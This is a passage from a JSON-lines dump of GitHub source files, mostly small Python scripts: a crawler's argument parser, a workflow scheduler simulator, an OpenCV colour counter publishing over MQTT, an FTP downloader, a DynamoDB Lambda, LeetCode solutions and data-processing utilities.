index=False)\n\n print(\"df_train.csv:\")\n print(df_train['label'].value_counts())\n print()\n print(\"df_valid.csv:\")\n print(df_valid['label'].value_counts())\n print()\n print(\"df_test.csv:\")\n print(df_test['label'].value_counts())\n","repo_name":"awwkl/github-DAP","sub_path":"dataframe-building/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"14818367022","text":"\"\"\"\nThis module contains a logger object that can be used to log messages to a file and the console.\nYou can edit the .setLevel() method to change the level of the messages that are logged.\n\"\"\"\n\nimport logging\nimport argparse\nfrom multiprocessing import cpu_count\n\n\n# Class to customize the help message format\nclass CustomHelpFormatter(argparse.HelpFormatter):\n\t\"\"\"\n\tFormats the help message to display the arguments in a more readable format\n\t\"\"\"\n\n\tdef _format_action_invocation(self, action):\n\t\t\"\"\"\n\t\tFormats the arguments in the help message\n\t\tArgs:\n\t\t\taction (argparse.Action): Action object containing the arguments\n\t\tReturns:\n\t\t\tFormatted string containing the arguments\n\t\t\"\"\"\n\t\tif not action.option_strings:\n\t\t\tmetavar, = self._metavar_formatter(action, action.dest)(1)\n\t\t\treturn metavar\n\t\telse:\n\t\t\tparts = []\n\n\t\t\t# If the Optional doesn't take a value, format is `-s, --long`\n\t\t\tif action.nargs == 0:\n\t\t\t\tparts.extend(action.option_strings)\n\n\t\t\t# If the Optional takes a value, format is `-s ARGS, --long ARGS`\n\t\t\telse:\n\t\t\t\tdefault = action.dest.upper()\n\t\t\t\targs_string = self._format_args(action, default)\n\t\t\t\tfor option_string in action.option_strings:\n\t\t\t\t\tparts.append(f'{option_string} {args_string}')\n\n\t\t\treturn ', '.join(parts)\n\n\tdef _format_action(self, action):\n\t\t\"\"\"\n\t\tFormats the help message for each argument\n\t\tArgs:\n\t\t\taction (argparse.Action): Action object containing the arguments\n\t\tReturns:\n\t\t\tformatted_help (str): Formatted string containing the help message for each argument\n\t\t\"\"\"\n\t\thelp_text = self._expand_help(action)\n\t\taction_header = self._format_action_invocation(action)\n\n\t\t# Left-justify action header strings with padding\n\t\taction_header = action_header.ljust(self._action_max_length)\n\n\t\t# Create the formatted help string without a line break between the action and help text\n\t\tformatted_help = f'{action_header} {help_text}\\n'\n\n\t\treturn formatted_help\n\n\ndef createLogger():\n\t\"\"\"\n\tCreates a logger object that can be used to log messages to a file and the console\n\tReturns:\n\t\tlogger (logging.Logger): Logger object\n\t\"\"\"\n\t# Create a formatter to format the log messages\n\tformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\t# Create a logger object\n\tlogger = logging.getLogger('output')\n\tlogger.setLevel(logging.DEBUG)\n\n\t# Clear any existing handlers in the logger\n\tif logger.hasHandlers():\n\t\tlogger.handlers.clear()\n\t# Create a file handler that writes log messages to a file\n\n\tfile_handler = logging.FileHandler('output.log')\n\tfile_handler.setLevel(logging.DEBUG)\n\tfile_handler.setFormatter(formatter)\n\tlogger.addHandler(file_handler)\n\treturn logger\n\n\n# Get CLI arguments\ndef parseArguments():\n\t\"\"\"\n\tParses the arguments passed to the script\n\tReturns:\n\t\targuments (argparse.Namespace): Namespace object 
containing the arguments\n\n\t\"\"\"\n\tthreads = cpu_count() - 2 if cpu_count() > 4 else 1\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"Simple script to crawl a domain for subdomains and directories\",\n\t\tformatter_class=CustomHelpFormatter,\n\t\tadd_help=False\n\t)\n\n\t# Help argument\n\tparser.add_argument(\"-h\", \"--help\", action=\"help\", help=\"Show this help message and exit\")\n\n\t# Required argument: domain\n\tparser.add_argument(\"domain\", help=\"Specify a domain\")\n\n\t# Optional argument: output_dir\n\tparser.add_argument(\"-o\", \"--output_dir\", help=\"Specify the output directory\", default=\"output_files\")\n\n\t# Optional argument: threads\n\tparser.add_argument(\"-t\", \"--threads\",\n\t type=int, default=threads,\n\t help=f\"Specify the number of threads to use, (default: {threads})\")\n\n\t# Optional argument: username\n\tparser.add_argument(\"-u\", \"--username\", help=\"Specify the username\")\n\n\t# Optional argument: password_file\n\tparser.add_argument(\"-p\", \"--password_file\", help=\"Specify the password file\")\n\n\t# Store arguments inside args object and return it\n\targuments = parser.parse_args()\n\treturn arguments\n","repo_name":"ElioaChukri/domain_crawler","sub_path":"accessories.py","file_name":"accessories.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42469129812","text":"#!/usr/bin/env python3\n\nimport json\nfrom copy import copy\nimport heapq\nimport gevent.pool\nfrom gevent.lock import BoundedSemaphore\nfrom timeit import default_timer as timer\nfrom math import ceil\nimport os.path\nfrom random import gauss\nfrom tqdm import tqdm\n\n\nclass Task(object):\n def __init__(self, tid, runtime, resources, planned_st, machine):\n self.tid = tid\n self.runtime = runtime\n self.resources = resources\n self.resources[0] = int(self.resources[0] * 1000)\n self.planned_st = planned_st\n self.machine = machine\n self.succs = []\n self.outputs = []\n self.remaining_prevs = 0\n\n def execute(self):\n gevent.sleep(self.runtime)\n\n def __repr__(self):\n return \"Task<{}>[{}s]\".format(self.tid, self.runtime)\n\n\nclass Comm(object):\n def __init__(self, from_task, to_task, data_size, planned_st, planned_ft):\n self.from_task = from_task\n self.to_task = to_task\n self.data_size = data_size\n self.planned_st = planned_st\n self.planned_ft = planned_ft\n\n def execute(self):\n rate = 125829120\n gevent.sleep(ceil(self.data_size / rate))\n\n def suspend(self):\n pass\n\n def resume(self):\n pass\n\n def __repr__(self):\n return \"COMM<{}=>{}>\".format(self.from_task.tid, self.to_task.tid)\n\n\nclass Machine(object):\n def __init__(self, capacities):\n self.remaining_resources = copy(capacities)\n self.remaining_resources[0] = (self.remaining_resources[0] * 1000)\n self.suspended_sending = []\n self.suspended_receiving = []\n self.current_receiving = None\n self.current_sending = None\n self.sending_lock = BoundedSemaphore(1)\n self.receiving_lock = BoundedSemaphore(1)\n\n def add_sending_comm(self, comm):\n self.sending_lock.acquire()\n if self.current_sending:\n self.current_sending.suspend()\n self.suspended_sending.append(self.current_sending)\n self.current_sending = comm\n self.sending_lock.release()\n\n def finish_sending_comm(self):\n self.sending_lock.acquire()\n if self.suspended_sending:\n self.current_sending = self.suspended_sending.pop()\n self.current_sending.resume()\n else:\n self.current_sending = None\n 
self.sending_lock.release()\n\n def add_receiving_comm(self, comm):\n self.receiving_lock.acquire()\n if self.current_receiving:\n self.suspended_receiving.append(self.current_receiving)\n self.current_receiving.suspend()\n self.current_receiving = comm\n self.receiving_lock.release()\n\n def finish_receiving_comm(self):\n self.receiving_lock.acquire()\n if self.suspended_receiving:\n self.current_receiving = self.suspended_receiving.pop()\n self.current_receiving.resume()\n else:\n self.current_receiving = None\n self.receiving_lock.release()\n\n def remove_resources(self, resources):\n self.remaining_resources[0] -= resources[0]\n self.remaining_resources[1] -= resources[1]\n\n def add_resources(self, resources):\n self.remaining_resources[0] += resources[0]\n self.remaining_resources[1] += resources[1]\n\n\nclass Scheduler(object):\n task_cls = Task\n comm_cls = Comm\n\n def __init__(self, allow_share=False, allow_preemptive=False):\n self.allow_share = allow_share\n self.allow_preemptive = not allow_share and allow_preemptive\n self.log = False\n\n def load(self, path):\n self.alg_name = os.path.basename(path)[:-9]\n with open(path) as f:\n raw_schedule = json.load(f)\n self.num_tasks = raw_schedule[\"num_tasks\"]\n num_machines = len(raw_schedule[\"machines\"])\n capacities = raw_schedule[\"vm_capacities\"]\n self.allow_share = self.allow_share or raw_schedule[\"allow_share\"]\n self.allow_preemptive = self.allow_preemptive or raw_schedule[\"allow_preemptive\"]\n\n self.tasks = {}\n self.machines = []\n for raw_machine in raw_schedule[\"machines\"]:\n machine = Machine(capacities)\n self.machines.append(machine)\n for raw_task in raw_machine:\n tid = raw_task[\"id\"]\n self.tasks[tid] = self.task_cls(\n tid, raw_task[\"runtime\"], raw_task[\"resources\"],\n raw_task[\"start_time\"], machine)\n\n for raw_machine in raw_schedule[\"machines\"]:\n for raw_task in raw_machine:\n task = self.tasks[raw_task[\"id\"]]\n for sid in raw_task[\"succs\"]:\n task.succs.append(self.tasks[sid])\n self.tasks[sid].remaining_prevs += 1\n for comm in raw_task[\"output\"]:\n to_task = self.tasks[comm[\"to_task\"]]\n to_task.remaining_prevs += 1\n data = self.comm_cls(task, to_task, comm[\"data_size\"],\n comm[\"start_time\"],\n comm[\"finish_time\"])\n task.outputs.append(data)\n\n def exec_task(self, task):\n if self.log: print(\"[S][{:.2f}s]{}\".format(timer() - self.RST, task))\n task.execute()\n self.remaining_tasks -= 1\n task.machine.add_resources(task.resources)\n\n for t in task.succs:\n t.remaining_prevs -= 1\n if not t.remaining_prevs:\n self.ready_tasks.add(t)\n for c in task.outputs:\n self.ready_comms.add(c)\n if self.log:\n print(\"[F][{:.2f}s]{}[{}/{}]\".format(\n timer() - self.RST, task, self.num_tasks -\n self.remaining_tasks, self.num_tasks))\n\n def exec_comm(self, comm):\n if self.log: print(\"[S][{:.2f}s]{}\".format(timer() - self.RST, comm))\n from_task = comm.from_task\n to_task = comm.to_task\n\n comm.execute()\n if not self.allow_share:\n from_task.machine.finish_sending_comm()\n to_task.machine.finish_receiving_comm()\n\n to_task.remaining_prevs -= 1\n if not to_task.remaining_prevs:\n self.ready_tasks.add(comm.to_task)\n if self.log: print(\"[F][{:.2f}s]{}\".format(timer() - self.RST, comm))\n\n def comm_is_ready(self, comm):\n if self.allow_share:\n return True\n elif self.allow_preemptive:\n for current_comm in [\n comm.from_task.machine.current_sending,\n comm.to_task.machine.current_receiving\n ]:\n current_comm = comm.from_task.machine.current_sending\n if current_comm and 
current_comm.planned_ft < comm.planned_ft:\n return False\n return True\n else:\n return not (comm.from_task.machine.current_sending\n or comm.to_task.machine.current_receiving)\n\n def task_is_ready(self, task):\n return all(\n x >= y\n for x, y in zip(task.machine.remaining_resources, task.resources))\n\n def schedule(self):\n current_time = timer() - self.RST\n for t in sorted(self.ready_tasks, key=lambda t: t.planned_st):\n if t.planned_st > current_time:\n break\n if self.task_is_ready(t) and t in self.ready_tasks:\n self.ready_tasks.remove(t)\n t.machine.remove_resources(t.resources)\n self.group.spawn(self.exec_task, t)\n for c in sorted(self.ready_comms, key=lambda c: c.planned_st):\n if c.planned_st > current_time:\n break\n if self.comm_is_ready(c) and c in self.ready_comms:\n self.ready_comms.remove(c)\n if not self.allow_share:\n c.from_task.machine.add_sending_comm(c)\n c.to_task.machine.add_receiving_comm(c)\n self.group.spawn(self.exec_comm, c)\n\n def prepare_workers(self, **kwargs):\n pass\n\n def run(self, log=\"d\", **kwargs):\n self.remaining_tasks = self.num_tasks\n self.prepare_workers(verbose=(log == \"d\"), **kwargs)\n self.RST = timer()\n self.ready_tasks = set(\n [t for t in self.tasks.values() if not t.remaining_prevs])\n self.ready_comms = set()\n self.group = gevent.pool.Group()\n if log == \"d\": self.log = True\n elif log == \"p\":\n pbar = tqdm(\n total=self.num_tasks-1,\n unit=\"task\",\n desc=\"{:<32}\".format(self.alg_name))\n while self.remaining_tasks:\n self.schedule()\n if log == \"p\":\n pbar.update(self.num_tasks - self.remaining_tasks - pbar.n)\n gevent.sleep(0.1)\n if log == \"p\": pbar.close()\n else:\n print(\"Makespan of {}: {:.2f}s\".format(self.alg_name,\n timer() - self.RST))\n\n\nif __name__ == \"__main__\":\n from sys import argv\n s = Scheduler(allow_share=True, log=True)\n for path in argv[1:]:\n s.load(path)\n s.run()\n","repo_name":"Tefx/WINO","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":9147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8166895485","text":"import numpy as np \nfrom matplotlib import pyplot as plt \n\ndef load():\n\twith open('CloudSeeding.txt') as f:\n\t\tdataSet = []\n\t\tfor line in f.readlines()[1:]:\n\t\t\tdataSet.append(list(map(float, line.strip().split())))\n\t\treturn np.array(dataSet)\n\n\t\t\nif __name__ == '__main__':\n\tcloud = load()\n\tX = cloud[:,0]\n\tY = cloud[:,1]\n\tx_hat = np.mean(X)\n\ty_hat = np.mean(Y)\n\ttheta_hat = x_hat - y_hat\n\tse_theta = np.sqrt(np.var(X) + np.var(Y))\n\t# 95% confidence interval\n\tCn = (theta_hat-1.96*se_theta, theta_hat+1.96*se_theta)\n\tprint(\"theta:\",theta_hat)\n\tprint( \"se(theta):\", se_theta) \n\tprint('95% confidence interval:',Cn)\n","repo_name":"DreamerDiWu/all_of_statistic","sub_path":"chapter7/CloudSeedingEstm.py","file_name":"CloudSeedingEstm.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8079583390","text":"import cv2 as cv\nimport numpy as np\nimport paho.mqtt.publish as publish\nimport drivers\n\n# hostname del servidor MQTT (en este caso el mismo Rpi)\nHOST_NAME = \"192.168.1.17\"\n\n# Rangos de detección en HSV\ngreen_range_low = np.array([20, 0, 108])\ngreen_range_high = np.array([88, 51, 192])\npink_range_low = np.array([157, 50, 140])\npink_range_high = np.array([180, 110, 220])\n\n# contador de productos\ncount = {'Pink': 0, 'Green': 
0}\n\n# inicialización del LCD (ver drivers y enlace para instalación)\ndisplay = drivers.Lcd()\ndisplay.lcd_display_string(\"*Detector de\", 1)\ndisplay.lcd_display_string(\"colores -- sdca*\", 2)\n\n\ndef frame_and_publish(src):\n global x_prev, count\n src_hsv = cv.cvtColor(src, cv.COLOR_BGR2HSV)\n # Aquí se agregarían más etiquetas\n mask = {'Pink': cv.inRange(src_hsv, pink_range_low, pink_range_high),\n 'Green': cv.inRange(src_hsv, green_range_low, green_range_high)}\n poly_approx = {'Pink': [], 'Green': []}\n\n for color in count:\n contours, hierarchy = cv.findContours(mask[color], cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n i = 0\n for contour in contours:\n area = cv.contourArea(contour)\n if area > 12000: # depende de la distancia de cámara, puede escogerse el área mayor también\n perimeter = cv.arcLength(contour, True)\n poly_approx[color].append(cv.approxPolyDP(contour, 0.02 * perimeter, True))\n x, y, w, h = cv.boundingRect(poly_approx[color][i])\n if x == 0 and x_prev != 0:\n count[color] += 1\n # colocar más datos si hay más etiquetas\n publish.single(\"data\", \"{},{}\".format(count['Pink'], count['Green']), hostname=HOST_NAME)\n display.lcd_clear()\n # cuestión de acomodar si hay más etiquetas\n display.lcd_display_string(\"Rosados: {}\".format(count['Pink']), 1)\n display.lcd_display_string(\"Verdes: {}\".format(count['Green']), 2)\n # En caso se quiera visualizar con conexión HDMI\n # Dibujar el contorno que es detectado\n # cv.drawContours(src, poly_approx[color], i, (0, 0, 255), 2)\n # Dibujar el rectángulo mínimo que lo rodea\n # cv.rectangle(src, (x, y), (x + w, y + h), (0, 255, 0), 1)\n # Colocar la etiqueta\n # cv.putText(src, '{}: {}'.format(color, count[color]), (x, y - 5), 1, 1.3,\n # (255, 255, 0), 1, cv.LINE_AA)\n i += 1 # el i solo avanza para los contornos que se deben dibujar\n x_prev = x\n return x_prev\n\n\ncap = cv.VideoCapture(0)\nx_prev = 10\ntry:\n while True:\n ret, frame = cap.read()\n if not ret:\n break\n frame_and_publish(frame)\n # Mostrar las imágenes en pantalla (HDMI)\n # cv.imshow('captura', frame)\n # cv.waitKey(10)\nexcept KeyboardInterrupt:\n print('\\nSaliendo del programa ...')\n display.lcd_clear()\n","repo_name":"sadelcarpio/color-detector-node-red","sub_path":"detect_and_frame.py","file_name":"detect_and_frame.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"72780165330","text":"\nimport requests\nfrom bs4 import BeautifulSoup\n \n \n\ndef web_sclink(data): \n# Making a GET request\n r = requests.get(data)\n \n# Parsing the HTML\n soup = BeautifulSoup(r.content, 'html.parser')\n ans=[]\n# find all the anchor tags with \"href\"\n for link in soup.find_all('a'):\n ans.append(link.get('href'))\n\n return ans \n\n","repo_name":"jitanshuraut/PYthon-Project","sub_path":"Backed-End/web_scaper_link.py","file_name":"web_scaper_link.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32230274269","text":"class Solution(object):\n def advantageCount(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n # 田忌赛马\n n = len(nums2) # len(nums1) == len(nums2)\n # O(nlogn)\n # nums1 由小排到大\n nums1.sort()\n index = [i for i in range(n)]\n # O(nlogn)\n # 将 nums2 的 index 按照 value 由大排到小\n index.sort(key=lambda i:nums2[i], reverse=True)\n res = [0 for i in range(n)]\n for i in index:\n # Win\n if 
nums1[-1] > nums2[i]:\n res[i] = nums1.pop()\n # Lose\n else:\n res[i] = nums1.pop(0)\n return res ","repo_name":"max870701/LeetCodeRecord-Python3-","sub_path":"870-AdvantageShuffle.py","file_name":"870-AdvantageShuffle.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2203254322","text":"import boto3\ndb = boto3.client('dynamodb')\nimport datetime\ndate=datetime.date.today()\n\ndef lambda_handler(event, context):\n message = event['Records'][0]['Sns']['Message']\n id = event['Records'][0]['Sns']['MessageId']\n\n response = db.put_item(\n Item={\n 'Date': {\n 'S': str(date),\n },\n 'MessageID': {\n 'S': id,\n },\n 'Message': {\n 'S': message,\n },\n },\n ReturnConsumedCapacity='TOTAL',\n TableName='15projectTABLE',\n )\n\n print(response)","repo_name":"cbates255/Python","sub_path":"Pythonprojects/15projectFINAL.py","file_name":"15projectFINAL.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29278760610","text":"# Ce script permet de télécharger un fichier du serveur FTP vers un dossier en local défini\n\nfrom ftplib import FTP\nimport os\n\n# Importe nos fonctions utiles\nimport sys\nsys.path.insert(0, '../')\nfrom utils import func\n\nfrom ftp import ftp_login\n\n# Importer les variables globales\nimport settings\n\n# Charge les paramètres\nsettings.init()\n\nftp = ftp_login.login()\n\ndef download():\n # Client dossier sauvegarde\n savedir = \"C:/Users/t.echnicien/Desktop/Reception_FTP\"\n os.chdir(savedir)\n\n # Serveur - se mettre dans le bon répertoire\n #ftp.cwd(\"MainFTP\")\n # Serveur - nom fichier à copier\n filename = \"Test.txt\"\n try:\n file = open(filename, \"wb\")\n except Exception as e:\n print(\"Problème lors de l'ouverture du fichier\")\n print(\"Erreur complète :\\n\", e)\n ftp.retrbinary('RETR ' + filename, file.write, 1024)\n try:\n file.close()\n except Exception as e:\n print(\"Problème lors de la fermeture du fichier\")\n print(\"Erreur complète :\\n\", e)\n print(\"Téléchargement terminé\\n\")\n","repo_name":"AngeIo/projet_python_netway","sub_path":"superscript/ftp/ftp_download.py","file_name":"ftp_download.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71019915731","text":"import random\n\ni = int(0)\nnumbers = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\nnegativeNumbers = []\nwhile i < 10:\n numbers[i] = int(random.uniform(-10, 10))\n i += 1\ni = int(0)\noddSum = int(0)\nk = int(0)\nmin = numbers[0]\nwhile i < 10:\n if numbers[i] < min:\n min = numbers[i]\n if numbers[i] < 0:\n negativeNumbers.append(numbers[i])\n if numbers[i] % 2 == 0:\n k += 1\n oddSum += numbers[i]\n i += 1\n\nprint(\"Максимальный отрицательный элемент массива: \", min)\nprint(\"Среднее арифметическое нечётных чисел равно \", oddSum / k)\nprint(\"Все отрицательные элементы: \")\ni = int(0)\nwhile i < len(negativeNumbers):\n print(negativeNumbers[i])\n i += 1\n","repo_name":"DanyilMykytenko/Uni","sub_path":"Python/Lab 1/Task 3/Task 3/Task_3.py","file_name":"Task_3.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37580170625","text":"from typing import Any\n\nfrom ..file_types import FileTypeName\n\n\nclass FileValues:\n def __init__(self, file_name: str, type_name: FileTypeName, values: 
list[dict[str, str]]):\n \"\"\"\n Represents the values of an env file.\n :param file_name: Name of the file uploaded. Could be specified by the user or the default name.\n :param type_name:\n :param values: List containing the [\"KEY\", \"VALUE\"] of an env file\n \"\"\"\n self.file_name = file_name\n self.type_name = type_name\n self.values = values\n","repo_name":"ftapiat/env-compare-rest","sub_path":"src/models/file_values/file_values.py","file_name":"file_values.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"41245559095","text":"# 一个机器人位于一个 m x n 网格的左上角 (起始点在下图中标记为“Start” )。 \n# \n# 机器人每次只能向下或者向右移动一步。机器人试图达到网格的右下角(在下图中标记为“Finish”)。 \n# \n# 问总共有多少条不同的路径? \n# \n# \n# \n# 例如,上图是一个7 x 3 的网格。有多少可能的路径? \n# \n# \n# \n# 示例 1: \n# \n# 输入: m = 3, n = 2\n# 输出: 3\n# 解释:\n# 从左上角开始,总共有 3 条路径可以到达右下角。\n# 1. 向右 -> 向右 -> 向下\n# 2. 向右 -> 向下 -> 向右\n# 3. 向下 -> 向右 -> 向右\n# \n# \n# 示例 2: \n# \n# 输入: m = 7, n = 3\n# 输出: 28 \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= m, n <= 100 \n# 题目数据保证答案小于等于 2 * 10 ^ 9 \n# \n# Related Topics 数组 动态规划 \n# 👍 765 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n # dp[i, j] = dp[i-1, j] + dp[i, j-1]\n def uniquePaths(self, m: int, n: int) -> int:\n if m == 0 or n == 0:\n return 0\n\n dp = []\n for j in range(n):\n dp.append([0] * m)\n\n for i in range(0, n):\n dp[i][0] = 1\n for j in range(0, m):\n dp[0][j] = 1\n for i in range(1, n):\n for j in range(1, m):\n dp[i][j] = dp[i-1][j] + dp[i][j-1]\n return dp[-1][-1]\n\nif __name__ == '__main__':\n s = Solution()\n print(s.uniquePaths(7, 3))\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"dozaza/my-leet-code","sub_path":"src/main/python/question_0062.py","file_name":"question_0062.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22039015667","text":"#!/opt/loca/bin/python\nimport sys, re, itertools, optparse\nfrom math import *\n\noptParser = optparse.OptionParser( \n \n usage = \"python %prog [options] \",\n \n description=\n \"This script takes output from the modified_SPIA R pipeline \" +\n \"and removes the unwieldy and really long list of hits for each miRNA.\",\n \n epilog = \n \"Written by Warren McGee (warren-mcgee@fsm.northwestern.edu), \" +\n \"Jane Wu Lab, Northwestern University, Chicago, USA. (c) 2014. 
\" + \n \"Released under the terms of the GNU General Public License v3.\" )\n\n(opts, args) = optParser.parse_args()\n\n\nif len( args ) != 2:\n sys.stderr.write( sys.argv[0] + \": Error: Please provide two arguments.\\n\" )\n sys.stderr.write( \" Call with '-h' to get usage information.\\n\" )\n sys.exit( 1 )\n\nin_file = args[0]\nout_file = args[1]\n\nwith open(in_file, 'r') as input:\n\twith open(out_file, 'w') as output:\n\t\theader = input.readline()\n\t\theaderList = header.split(\"\\t\")\n\t\tbadIndex = headerList.index(\"DEgeneList\")\n\t\t\n\t\theaderList.pop(badIndex)\n\t\tnewHeader = \"\\t\".join(headerList)\n\t\toutput.write(newHeader)\n\t\t\n\t\tfor line in input.readlines():\n\t\t\tlineList = line.split(\"\\t\")\n\t\t\t\n\t\t\tlineList.pop(badIndex)\n\t\t\tnewLine = \"\\t\".join(lineList)\n\t\t\toutput.write(newLine)\n","repo_name":"warrenmcg/TDP43_miRNA_Paper","sub_path":"step_7/removeBabelomicHitList.py","file_name":"removeBabelomicHitList.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1660971697","text":"# -*- coding: utf-8 -*-\nfrom omg.utils.dget import dget\nfrom omg.utils.age import age\n\n\ndef _col_version(res):\n vers = dget(res, [\"res\", \"status\", \"versions\"])\n if vers:\n operator_v = [v[\"version\"] for v in vers if v[\"name\"] == \"operator\"]\n if operator_v:\n return operator_v[0]\n return \"\"\n\n\ndef _col_available(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n available = [c[\"status\"] for c in conds if c[\"type\"] == \"Available\"]\n if available:\n return available[0]\n return \"Unknown\"\n\n\ndef _col_progressing(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n prog = [c[\"status\"] for c in conds if c[\"type\"] == \"Progressing\"]\n if prog:\n return prog[0]\n return \"Unknown\"\n\n\ndef _col_degraded(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n degraded = [c[\"status\"] for c in conds if c[\"type\"] == \"Degraded\"]\n if degraded:\n return degraded[0]\n return \"Unknown\"\n\n\ndef _col_since(res):\n conds = dget(res, [\"res\", \"status\", \"conditions\"])\n if conds:\n ltt = [c[\"lastTransitionTime\"] for c in conds if c[\"type\"] == \"Available\"]\n if ltt:\n yfile_ts = dget(res, [\"yfile_ts\"])\n return age(ltt[0], yfile_ts)\n return \"Unknown\"\n\n\n# Default columns (without -o wide)\n# NAME and AGE cols, if present, with None value,\n# will be handled by build_table function that will\n# fill them with the common name/age column functions\nDEFAULT_COLUMNS = {\n \"NAME\": None,\n \"VERSION\": _col_version,\n \"AVAILABLE\": _col_available,\n \"PROGRESSING\": _col_progressing,\n \"DEGRADED\": _col_degraded,\n \"SINCE\": _col_since\n}\n\n# Wide columns (with -o wide)\n# In addition to the default columns\nWIDE_COLUMNS = {\n}\n","repo_name":"kxr/o-must-gather","sub_path":"omg/get/output/table_modules/ClusterOperator.py","file_name":"ClusterOperator.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":152,"dataset":"github-code","pt":"66"} +{"seq_id":"36859584184","text":"\n# open a new file\nf = open(\"datafile.csv\", \"w\")\n\n# write headings, then some data\n# separated by the newline symbol\n# \\n which is like pressing Enter\nf.write(\"NAME,AGE,SEX\\n\")\nf.write(\"Robert,37,M\\n\")\nf.write(\"Kelly,29,F\\n\") \n\n# finish writing the file\nf.close()\n\ninput('Press ENTER to 
continue...')\n","repo_name":"joeclark-phd/databook","sub_path":"tutorials/tutorial01/writefile.py","file_name":"writefile.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"40941473501","text":"from typing import Union, Optional\n\nfrom pathlib import Path\n\nimport torch\nfrom whisper import Whisper, load_model\n\nfrom psifx.audio.transcription.tool import TranscriptionTool\nfrom psifx.io import vtt, wav\n\n\nclass WhisperTranscriptionTool(TranscriptionTool):\n \"\"\"\n Whisper transcription and translation tool.\n \"\"\"\n\n def __init__(\n self,\n model_name: str = \"small\",\n task: str = \"transcribe\",\n device: str = \"cpu\",\n overwrite: bool = False,\n verbose: Union[bool, int] = True,\n ):\n super().__init__(\n device=device,\n overwrite=overwrite,\n verbose=verbose,\n )\n\n self.model_name = model_name\n self.task = task\n self.model: Whisper = load_model(model_name, device=self.device)\n # Freeze the model.\n self.model.eval()\n for param in self.model.parameters():\n param.requires_grad = False\n\n def inference(\n self,\n audio_path: Union[str, Path],\n transcription_path: Union[str, Path],\n language: Optional[str] = None,\n ):\n \"\"\"\n Whisper's backed transcription method.\n\n :param audio_path: Path to the audio track.\n :param transcription_path: Path to the transcription file.\n :param language: Country-code string of the spoken language.\n :return:\n \"\"\"\n audio_path = Path(audio_path)\n transcription_path = Path(transcription_path)\n\n if self.verbose:\n print(f\"audio = {audio_path}\")\n print(f\"transcription = {transcription_path}\")\n\n wav.WAVReader.check(audio_path)\n vtt.VTTWriter.check(transcription_path)\n\n # PRE-PROCESSING\n # Nothing to do here, the model wants the path of the audio.\n\n # INFERENCE\n with torch.no_grad():\n segments = self.model.transcribe(\n audio=str(audio_path),\n task=self.task,\n language=language,\n verbose=self.verbose > 1,\n )[\"segments\"]\n\n # POST-PROCESSING\n vtt.VTTWriter.write(\n segments=segments, path=transcription_path, overwrite=self.overwrite\n )\n","repo_name":"GuillaumeRochette/psifx","sub_path":"psifx/audio/transcription/whisper/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36786800781","text":"import api_key\nimport pymongo\n\nmongo_client = pymongo.MongoClient(api_key.MONGO_STRING)\ndatabase = mongo_client[\"Pondo2022Database\"]\npoliticians = database[\"Politicians\"]\nparties = database[\"Parties\"]\n\nparty_set = set()\nfor politician in politicians.find({}):\n party_set.add(politician['party'])\n\nfor party in party_set:\n if parties.find_one({ 'name': party }) is not None:\n continue\n parties.insert_one({ 'name': party })","repo_name":"Davit-G/Pondo2022","sub_path":"server/utils/update_parties.py","file_name":"update_parties.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"29095792262","text":"#!/usr/bin/env python\n\"\"\"Bibliography handler\"\"\"\n\nimport argparse\nimport datetime\nimport configparser\nimport logging\nimport re\nimport string\nimport sys\n\nimport mako\nfrom 